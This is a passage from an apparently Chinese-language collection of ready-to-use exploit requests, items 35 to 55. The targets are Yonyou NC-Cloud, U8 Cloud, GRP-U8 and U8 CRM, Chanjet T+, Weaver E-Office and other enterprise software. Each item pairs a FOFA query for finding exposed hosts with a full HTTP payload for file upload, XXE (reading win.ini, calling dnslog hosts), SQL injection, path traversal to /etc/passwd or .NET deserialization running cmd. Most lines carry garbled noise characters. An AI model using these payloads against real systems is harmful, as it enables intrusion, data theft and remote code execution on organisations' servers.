! q: k. X4 C8 ZAccept-Encoding: gzip, deflate
; C" n: D! z5 X8 m/ LAccept: */*
, J' K+ n% I3 dConnection: keep-alive
" R" l8 _: U3 j
+ _! Z0 M0 c5 f& `0 O* F+ a2 L$ _0 f" D! L3 F1 T- u% s( o6 C, M# [
35. 用友NC-Cloud importhttpscer任意文件上传  o5 o) K' D: {/ v/ [/ W0 T( `6 d
FOFA:app="用友-NC-Cloud"
+ V# z  Z/ _4 e" T9 j: o: EPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
1 s3 I3 l) U& U# o+ @' {$ hHost: 203.25.218.166:8888+ W" s7 b7 t+ _! t7 j2 {
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
/ v% p  M1 c; g# X, IAccept-Encoding: gzip, deflate
+ x; `  W+ d* e2 i+ ?Accept: */*- {+ a% ^# B: L$ @6 \# ]: Y
Connection: close
  Y' x9 D+ H" X6 Q8 E$ L5 {) B# naccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
/ @6 |% O( q4 cContent-Length: 190
: ]& [8 O9 t+ O8 R. A6 LContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0# W; B* s+ H; \, m3 |$ y- F$ B/ [

' w0 @  D4 k2 O8 x( o--fd28cb44e829ed1c197ec3bc71748df0
4 E! P" f0 \4 YContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"  o! q, V" l/ P( x. `

/ `* a( b- l' D  Z# S1 m0 x: }<%out.println(1111*1111);%>
: V4 n5 I8 t- a$ e1 @$ z0 L--fd28cb44e829ed1c197ec3bc71748df0--) Z. H7 K# `" B1 p+ d6 Z

/ ]4 J% P9 Z& J/ D; I
0 ]" [- a* V! |" ^, y! v8 Q+ R36. 用友NC-Cloud soapFormat XXE
% f- Y  U( d4 N: D/ G7 J; D0 H7 ~FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/": }* Z' b, q3 I) z
POST /uapws/soapFormat.ajax HTTP/1.12 o! I, B! n) e$ D! q( W2 e1 ?
Host: 192.168.40.130:8989
1 z2 ~0 ^" Y7 b3 sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
& k6 ?* T& s7 x5 ]0 c3 P9 y2 ^7 ]Content-Length: 263% }3 O- [8 p9 a2 V0 N" z# ?( }2 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 K, ?3 j3 z% v; I$ p& k# a- q1 KAccept-Encoding: gzip, deflate2 B( G' W0 ]' O' @$ U2 ?! n* y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 c- D( _# Z/ AConnection: close
3 ~' t# t8 i1 o9 g8 Z1 J1 \6 ZContent-Type: application/x-www-form-urlencoded7 m, {( o7 `) f" i) y( ?
Upgrade-Insecure-Requests: 19 Y" i1 T0 H6 r5 e5 S4 c
; i5 t- a7 o5 R# [
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a- F! D) X/ T; T. N
4 P& D6 O  f# D/ ~, c% j! x

( D. G" h( m- R; @% C4 F4 l* G! z/ F37. 用友NC-Cloud IUpdateService XXE" M7 z; @! e3 i  {' a
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"( {- _6 ~( ^- n" Y4 h* z
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1* a8 G( J# f, t1 U7 b+ V7 Q
Host: 192.168.40.130:8989, v, D6 h" [0 i5 m8 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36& }$ o" Q3 u  m
Content-Length: 421! V9 H) L* L) r0 v/ ~% {- e0 p# E: Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( j* f) T+ k, ~8 ~
Accept-Encoding: gzip, deflate! o( P# E" ~; o4 `3 }
Accept-Language: zh-CN,zh;q=0.94 U" \8 `2 r! W, b6 G" ~
Connection: close
& }1 u, p. \! GContent-Type: text/xml;charset=UTF-8
- \6 ^, W1 h0 O: ]/ zSOAPAction: urn:getResult  j, d2 }8 J5 i
Upgrade-Insecure-Requests: 1
' i: r3 [, ]$ l" h* K+ r2 d/ i9 z: |# r! H& ]$ [2 I
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">' m- v  a7 n" A3 S- h
<soapenv:Header/>
0 K: A& `3 B1 W1 M( @- q& s<soapenv:Body>3 A% R0 `/ h1 r  [1 ~' r& U) ~
<iup:getResult>, h7 }. ?! T+ s2 Y7 u8 G2 ~
<!--type: string-->- u6 u# L7 ?; [$ D6 _
<iup:string><![CDATA[; D! S  x6 T7 o& U. ]
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
$ D( X' y# t8 p) U<xxx/>]]></iup:string>/ i7 ]/ F- R  |
</iup:getResult>: e$ y  h5 }) h* \' J4 X
</soapenv:Body>
4 o$ e7 ^! S' P$ O9 G! v- l</soapenv:Envelope>$ t+ `/ i# H/ D
3 S3 E& D  b: {" v; b% W& c6 m
% D) H" F  N' Q& Q6 P. [. n5 N
1 T3 o8 d3 p  _( w) V. d
38. 用友U8 Cloud smartweb2.RPC.d XXE
( a& `) _, b' ?4 z) M! w! ^FOFA:app="用友-U8-Cloud"2 D& |* e9 b* e3 }* @
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1; U) i7 G* w) u; g" N2 q' e; h8 q
Host: 192.168.40.131:8088
" y) P1 ~, a6 u0 r; W! C: C3 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
6 l( J, R' }( D7 M; D# V4 o- bContent-Length: 2607 x$ T8 C$ u" Y- v; i% U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
. k) I$ x5 [' ]' FAccept-Encoding: gzip, deflate4 w: x& Z- M4 t6 d! [: {
Accept-Language: zh-CN,zh;q=0.9
0 M! C' b' i4 C4 |  Q* BConnection: close
6 E8 ?( D/ {. l" _5 Z+ sContent-Type: application/x-www-form-urlencoded
$ d! x8 B. q0 f9 G/ q5 H& t# q5 `
% Z9 B( z/ {; t$ R4 V( o__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc># B" v* T5 i2 A( W- e& W
. {6 P' s: p3 w; e* F* {
0 O7 B7 |' m. I3 j
39. 用友U8 Cloud RegisterServlet SQL注入
+ B  `4 h9 f& w1 mFOFA:title="u8c"9 q. Z' h9 n: v4 h
POST /servlet/RegisterServlet HTTP/1.18 }' I, j. I; }/ {- l4 p
Host: 192.168.86.128:8089# P( H! T: Z: ~( B% K* H  p6 a
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
( r4 W* a- Q  O/ k  y; u4 iConnection: close
& x+ s2 x( H: h  FContent-Length: 85, f9 C$ P5 l* l$ W* o' E, p
Accept: */*
! m0 o7 I( v9 l* B/ G% `1 _Accept-Language: en6 b0 L0 R. F  E
Content-Type: application/x-www-form-urlencoded% H4 d% G( A. U5 o& Y0 S' r, R
X-Forwarded-For: 127.0.0.18 M2 z2 ^5 e7 z: c
Accept-Encoding: gzip
0 {; ]- W3 A& E0 I- g( ~4 M* s: U' h' [3 [% P- x5 ~! Q3 G6 L1 t
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--  p8 \* s8 y# J
% g5 I& r4 H5 X+ k

; q5 T5 ]6 l8 t. e40. 用友U8-Cloud XChangeServlet XXE4 [2 X4 K3 v0 e2 X% p9 n5 d
FOFA:app="用友-U8-Cloud"
- o2 ^# S2 t4 W! J: n) [POST /service/XChangeServlet HTTP/1.1# |8 t. g* u: D
Host: x.x.x.x' Y' G8 j2 N  g" f
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ ]+ G' G6 a# C( |0 a* Y
Content-Type: text/xml" l, d  r5 i$ l7 n5 y/ A( ~) ]! D8 q* U
Connection: close
* P6 b+ W# e' b- A8 M9 c1 g) U* @8 W/ H1 a
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>( G4 Q2 p9 X5 @6 X7 ]: @( X

3 V8 e" s! B: F9 Z6 B$ y! T
( S* U; \8 G9 C, f41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
3 e$ K* ~: n! o3 M* V* U2 DFOFA:app="用友-U8-Cloud": l8 W! R( f4 ~
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1' ^0 {" V4 G2 a8 E, p
Host:
6 q# E8 m8 H) C4 |) {) r4 r8 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 [4 A( W0 z) z) t8 c. W* o
Content-Type: application/json; Z; U  b# G6 [$ i6 N/ a
Accept-Encoding: gzip
+ n7 B  G5 M0 v2 @Connection: close; o3 D  s  E0 I# A9 ^; |! @' K4 \
% u3 |; e! u/ Q- C8 c

* Z6 d2 U& M( m  \8 Z3 A42. 用友GRP-U8 SmartUpload01 文件上传' ^: o  K$ Z" l+ ]
FOFA:app="用友-GRP-U8"3 _8 S6 a5 B4 }' G1 a9 J6 `" x
POST /u8qx/SmartUpload01.jsp HTTP/1.1# c* r' Y/ i: _( O9 z
Host: x.x.x.x
" R3 @# E4 m" aContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
! E8 J5 h5 u/ F- `+ B+ v. N0 p# XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
/ R' C8 @; b; p+ B. J* V: b! |5 D; q
4 g% S# j( z! ~) H7 ^& CPAYLOAD
1 r' @7 `- p, p0 W- S% Y
2 Z  s/ g* L% ]" X: `. i1 }4 w: a. \! q1 j) }. X4 {; }& p2 q; T; `
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml# |9 ]; l* y2 k8 f2 @1 \6 U+ |
0 o: e. b) |) v, g+ z" d
43. 用友GRP-U8 userInfoWeb SQL注入致RCE: P- K- x7 s( ~2 x" n! P1 \
FOFA:app="用友-GRP-U8"
- j+ w, ^; M2 J6 uPOST /services/userInfoWeb HTTP/1.1
. ]% E1 X* r: h0 p% N4 vHost: your-ip
5 N- F5 V0 K5 \5 l# [" u* F4 d1 FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
* E7 C, [& k4 A9 a2 h+ Y  ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 G: u: c7 ^7 ^
Accept-Encoding: gzip, deflate; v7 t+ v! r. d* q9 g5 m$ n
Accept-Language: zh-CN,zh;q=0.9
9 f& v* o! G8 w+ WConnection: close3 l3 y9 {0 ^2 e/ m1 X/ i) |% H) A
SOAPAction:
  W1 y; o6 r" kContent-Type: text/xml;charset=UTF-8, B0 c% i' m. I/ C
: m& C( s5 h" U
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">4 K- N# ^) f* D6 ?/ x
   <soapenv:Header/>
0 L5 v/ h+ P. E1 l" j0 I7 C   <soapenv:Body>4 v6 A2 }) V; P8 f- f; t; t0 N& b
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
4 t( R' C! [# D  w1 S; w+ V( n         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>6 `, ?9 P+ {" V6 J. y* Q2 U# z
      </ser:getUserNameById>
" k- k: ~6 i  |2 `! S* I0 l   </soapenv:Body>
- N2 Y- F; K7 @0 ~5 w/ F</soapenv:Envelope>
) Y5 i* O2 r% ?( H+ j
5 @6 O! E6 j$ n, F. D3 [( E7 q* d
  O9 Q, j* b0 ]( m8 T% t  c44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ M8 R. K0 i7 Z" ~7 p9 bFOFA:app="用友-GRP-U8"
/ H( q0 F6 A1 r" @# D+ QGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1& z9 G/ J: Y1 u$ X+ R( u5 k
Host: your-ip
. ~( I% f! y! h9 ~/ n- WUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
5 Y) [# ~. T4 wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 E; o3 b3 ~% Y7 c2 O
Accept-Encoding: gzip, deflate/ q6 y3 D- ^6 H. e4 C& |
Accept-Language: zh-CN,zh;q=0.90 Y5 i2 B' v* p+ f* U
Connection: close' l; U* N; ?  _) n) W; l% ^

, M# b% [1 _1 C9 I4 ]) \
; q6 p& ^4 {9 ^, k% P45. 用友GRP-U8 ufgovbank XXE7 d9 ~5 S7 D' B9 v2 d1 r, L
FOFA:app="用友-GRP-U8"3 x! v5 Z) V, Q( g) c; U
POST /ufgovbank HTTP/1.19 _% C% H  Y$ s9 M
Host: 192.168.40.130:222
" B* x$ s, q7 C. f- zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
" k9 Z; d9 \7 N% ]Connection: close
% t; a* Q0 f, S3 E( P4 aContent-Length: 161
/ y0 l) m" @: g1 gAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' c( a! z- e4 g5 c' ]* EAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ a+ }- d8 o0 H) l2 B% w" fContent-Type: application/x-www-form-urlencoded3 u+ j! P* l9 e7 j5 v0 v; J( M2 C
Accept-Encoding: gzip: h: D& ?$ M3 {0 u. t5 y

3 G  S' s( q' G0 }! }9 _, n7 lreqData=<?xml version="1.0"?>+ |, ]3 j9 @0 n, I, d  j! Q
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest% S0 z1 y% E: h& c# B

, b9 V+ E) y+ ^# R# B2 i( P- q7 w6 Y  ^" e5 d: P3 a
46. 用友GRP-U8 sqcxIndex.jsp SQL注入  ?5 s7 k1 v4 _7 u. Y
FOFA:app="用友-GRP-U8"
8 X7 }) d% ^/ f. B2 h5 c7 v% I- P0 TGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
' G* h6 W2 N5 {) v) ?) SHost: your-ip' u: d. `; i2 H* @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36  n& N# m! p$ d6 y' C0 v& g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) g- j8 k  p" |$ s- w+ iAccept-Encoding: gzip, deflate, u1 o2 Z; Z  u/ r7 u* d
Accept-Language: zh-CN,zh;q=0.94 R# g# k- ~# B) p& u
Connection: close
; e+ F0 ~2 C& w. I8 w7 i
* I; M, ?* n2 j. g% ]5 ~* q9 k) R! r6 t7 \1 f
47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 t- A, [) r$ Q0 m% l" E2 ]FOFA:body="/pf/portal/login/css/fonts/style.css"( D$ `0 B( n6 _3 A, N( l
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
9 n$ x/ N9 g0 [6 J, z. R* OHost: x.x.x.x
, p* V# c6 W: U/ n: YCache-Control: max-age=0- \8 d; [# s2 a3 ?# H
Upgrade-Insecure-Requests: 1
7 L/ N  h* l* w( A1 w' aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
) T% C; w  q0 `: U" XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 V: o, H5 c% B! `Accept-Encoding: gzip, deflate, br
6 g  o5 ?: V+ {# |6 O  r5 KAccept-Language: zh-CN,zh;q=0.9  {) R  Z% ^+ Q+ L% V* h
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
& P  u( \5 V. ^# ^0 E/ j! @Connection: close
& H& A6 l: ^+ R1 ?" A
7 }7 M; ?9 e  @* i4 |4 w' Y
/ B9 S' v2 d( o  d# ]7 Q6 b  s1 v: z9 w& u& Q
48. 用友U8 CRM swfupload 任意文件上传
  i8 ]4 \1 ^* X/ R  XFOFA:title="用友U8CRM". m* ^$ `" m  q% N8 k3 ~; K- k
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1( t$ e( e4 E7 r, h; S; Q1 B
Host: your-ip, r; d8 q8 U% I6 ]6 H8 o  n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0/ m3 i1 S$ W, X& K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* @. p/ \( z; d" w- f" G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. V; }3 z- I- N) m3 u! |* j
Accept-Encoding: gzip, deflate
4 q1 ^% _2 S% v7 ?" E: qContent-Type: multipart/form-data;boundary=----2695209672394068716424300668551 S% c9 D8 H5 m
------269520967239406871642430066855' B9 K2 t! P5 J! g
Content-Disposition: form-data; name="file"; filename="s.php"$ D( u* }4 U( w0 |3 I4 O1 I
1231' T% }3 r- [: z
Content-Type: application/octet-stream  C- x# y( \7 C9 t
------269520967239406871642430066855; E2 h" D" z- o, A8 U, f  |' w$ L
Content-Disposition: form-data; name="upload"
, i: E6 a' [+ D  W4 y5 ~upload
' ?) ~* o. @: ]7 t. c" l------269520967239406871642430066855--
5 {! p3 c" |4 J/ ]' ~( O) N
6 U$ `- u, ~: O+ C2 X4 u. e& ]; }& ^- v0 X
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
2 Z/ t. x, ]6 C& v3 O. a, e  qFOFA:body="用友U8CRM"5 L8 V2 g8 Q% H# o7 y
# b$ g# ~" H, m( H
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
/ i  v2 m% R" a& r  hHost: x.x.x.x
1 e  w& i+ D; o9 u& bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
  w( B3 G; O" P- y2 K+ C& _Content-Length: 3297 p/ L7 \( ]- ~  W& T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# F$ K+ }# l: b8 ]8 F4 I4 J% q
Accept-Encoding: gzip, deflate
" o& e) C6 y+ a8 |% RAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# N$ r' R1 W8 O* c$ }. U" d. I- IConnection: close
2 m4 k( P6 F+ x5 g5 F; R  IContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w7 }) D/ j+ `: L4 O  ^; J

, g! v6 h/ M1 m3 [5 W7 B-----------------------------vvv3wdayqv3yppdxvn3w" n5 X( L" p# o  b1 W6 [, X
Content-Disposition: form-data; name="file"; filename="%s.php "
$ r6 ^  }) z4 H9 o1 @Content-Type: application/octet-stream
/ U6 k% K$ U9 `% |" s1 }3 B' y2 S$ B2 U% \+ Q6 X
wersqqmlumloqa
5 v2 F) d" g8 G7 @-----------------------------vvv3wdayqv3yppdxvn3w& M2 g; B: l4 g- J5 _5 B; G. y+ K
Content-Disposition: form-data; name="upload"
6 C9 c+ j& K9 y  m8 V- j9 G
# \2 N2 U! `4 \8 y9 K  hupload0 I" H. A8 I, o: Y2 @8 V
-----------------------------vvv3wdayqv3yppdxvn3w--
1 _! }2 I7 P) ^  G/ v; c9 U
0 N! p( A4 g  w9 F- X; E  @5 E3 k/ b; `4 s5 c4 C4 A7 c
http://x.x.x.x/tmpfile/updB3CB.tmp.php
& i; u# E6 L( ]; I
3 |' i/ W: F) D50. QDocs Smart School 6.4.1 filterRecords SQL注入- U8 L* H' y! p7 L  @
FOFA:body="close closebtnmodal"
% z7 o8 D) B2 X( Q1 @) V. EPOST /course/filterRecords/ HTTP/1.15 c7 r+ D" _( t9 T6 l
Host: x.x.x.x
, C! V6 |- F) XUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ C* L; d* x4 `$ N/ G0 }; I& H- j
Connection: close
, i) n& W8 X# `1 PContent-Length: 2241 `& k) P1 j5 |% A" e) v- T
Accept: */*
1 o' v7 h' \$ F  N, T6 d9 h% b3 T6 {Accept-Language: en$ \; j4 @  j  F1 k5 K8 ~) ?2 N
Content-Type: application/x-www-form-urlencoded
+ g" m9 x2 B. |: }- {7 l! ]$ IAccept-Encoding: gzip
3 ~) U( |5 j, [4 T1 k; v, [. Y0 h) j* q1 R2 |( a
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
4 A4 u7 @1 e* Y! S, r3 x# k; Q
+ D1 o. M$ o. V8 u/ U  w" a  i3 z$ I: z( A8 V3 `
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
" f7 X9 _  Z& Q5 \" ^FOFA:app="云时空社会化商业ERP系统"( H7 Q) I* h' [; c2 ~
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
  ]7 V3 [+ M. d" dHost: your-ip" P+ B# E3 @' g- \" Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
" I( [" s, |7 _( P  ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.95 V% y& n1 W2 H8 x! N2 c+ b0 y
Accept-Encoding: gzip, deflate% D$ l% O/ z  I3 g, H7 _7 |+ G: j0 {
Accept-Language: zh-CN,zh;q=0.9
8 N; E% q9 p8 U# L* p- EConnection: close
' ?. H$ {2 \8 I  s* X
, W4 d( S' |) A/ a" C8 f" w/ D( O( n1 r6 L% n0 ~  Y) L& C( H* g
52. 泛微E-Office json_common.php sql注入  Q1 ?( V5 n+ L2 B% ^
FOFA:app="泛微-EOffice"
2 i( K/ M3 ~: V- {POST /building/json_common.php HTTP/1.16 u% W" H2 d' Q, v  s6 I
Host: 192.168.86.128:8097) o- n2 A4 G# u& v
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36( d/ W! E3 D! s+ U2 F% q
Connection: close
8 [7 T, m5 g- r- n; PContent-Length: 87
4 R/ K1 _% k. B6 v+ `0 ?0 ]3 R4 R6 DAccept: */*
5 l6 n& f0 U/ Q5 f: L  {( Y- Q3 OAccept-Language: en
' I. T1 S, t5 |! T  r! V( jContent-Type: application/x-www-form-urlencoded6 I7 L! R$ c/ [  l% K, y- [9 g. m
Accept-Encoding: gzip
0 y! d/ S$ y3 t' M
2 Y. w/ J* U# ztfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333( q& E' \5 J9 b

# m7 |5 u; W# u; a. w' F% H& C) |( e, h1 j# _2 D& o$ O
53. 迪普 DPTech VPN Service 任意文件上传
- O' a* e1 `. s" E, l7 s% sFOFA:app="DPtech-SSLVPN"
5 S8 a' U4 }9 T% C/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd- z& z3 c7 Q7 L- G6 X# _, r& ^0 n% M$ o

" W: C9 i7 {& q- v" `' t$ t0 {/ F% p7 G/ R
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
3 {: d7 o1 r/ n% w5 y4 xFOFA:app="畅捷通-TPlus"* P6 d" \) r' K$ T
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
; d& S0 Z) @3 K3 ^9 V  w"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* n; k4 D1 N. ^. ^( ?  W! W3 W- H7 T. `. I
7 [* D8 E7 B1 p
完整数据包5 V2 H* S( e; r' d
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" |1 V' `& p+ X0 T+ {: l. i2 EHost: x.x.x.x
. s6 |. w; H0 z% xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
4 I4 Y  @/ p: o* I# S; BContent-Length: 593
4 C, @" h: Y, a5 y% }
$ ~& O2 M7 Y4 L" O  v- g: y{
% W7 c0 H. v$ w8 |) Q7 g2 t"storeID":{
; [; V' Q8 \  J8 _$ o, E "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
' x* O9 i4 j: y% V; P4 Y) S  ] "MethodName":"Start",+ e/ U! a7 A" a/ B& Z* E$ d- m
  "ObjectInstance":{4 Q& i5 g+ A2 d; D; f
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' \" X2 n4 v: d+ m
    "StartInfo":{$ G  L9 }. B: I9 N/ B$ g' L% x
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: Z- R/ o# u9 V7 o* I
    "FileName":"cmd",
- q/ B3 S- U$ l/ u: k/ Z1 r    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"' j8 F% U1 f$ v
    }
1 M( I$ M$ x$ Q! k! o& \4 J3 }0 v( T  }
0 B4 M- k1 A; v% |" L' U  }5 v& _) M1 F6 o6 K
}- t' |% p+ y  m9 h: E
& R( X! K" u! ?! R8 O% p9 x- h: Z

* H0 w. v2 w7 s8 `5 _5 |3 u. H第二步,访问如下url- s, L2 W) B# m; J5 b& j
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt' d+ {  l- D& b5 F& M6 e
# H: k5 K* f6 @, K# N# b# d0 K

3 F4 y, O- w) l+ e' R) Y- H55. 畅捷通T+ getdecallusers信息泄露; D/ a7 y4 x4 Y! Y3 t, M
FOFA:app="畅捷通-TPlus"" F; B- Q6 s/ M$ F
第一步,通过& j" ^- A: P& r* A' e3 F
